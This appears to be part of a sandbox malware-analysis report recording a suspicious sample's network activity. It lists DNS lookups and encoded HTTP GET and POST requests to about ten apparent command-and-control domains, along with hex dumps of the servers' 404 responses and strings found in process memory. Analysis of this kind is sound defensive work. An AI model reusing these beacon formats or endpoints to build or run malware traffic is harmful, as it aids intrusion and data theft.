            Source: global trafficHTTP traffic detected: GET /v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyh HTTP/1.1Host: www.weep.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyh HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyh HTTP/1.1Host: www.fontanerourgente.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyh HTTP/1.1Host: www.onlytradez.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1Host: www.32wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f9bc/?3L9l=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&kZr0=ht-lElyh HTTP/1.1Host: www.jaxo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh HTTP/1.1Host: www.xforum.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyh HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyh HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 201Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Raw: 33 4c 39 6c 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d Data Ascii: 3L9l=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:27:34 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:50 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:53 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:55 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:27:58 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:07 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 